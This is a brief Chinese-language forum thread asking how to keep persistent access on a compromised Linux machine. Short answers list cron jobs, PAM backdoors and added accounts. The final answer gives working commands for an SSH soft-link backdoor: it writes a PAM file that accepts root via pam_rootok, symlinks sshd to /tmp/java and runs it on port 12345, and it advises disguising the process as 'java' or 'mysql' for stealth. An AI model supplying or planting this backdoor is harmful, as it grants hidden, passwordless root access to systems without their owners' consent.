linux如何权限维持

请先 登录 后评论

4 个回答

dddddd

可以使用定时任务,pam后门,添加账号都可以

请先 登录 后评论
onco_mplete


attach-89f253c809a3877abdc967901436b27333307316.png

请先 登录 后评论
秋思

github上有很多权限维持的工具

请先 登录 后评论
online101

ssh软连接感觉意义比较大,同时 连接的进程名改为mysql 或java,隐蔽性好

``` echo " #%PAM-1.0 auth sufficient pam_rootok.so auth include system-auth account include system-auth password include system-auth session include system-auth " >> /etc/pam.d/java ``` 

ln -sf /usr/sbin/sshd /tmp/java;/tmp/java -oport=12345

请先 登录 后评论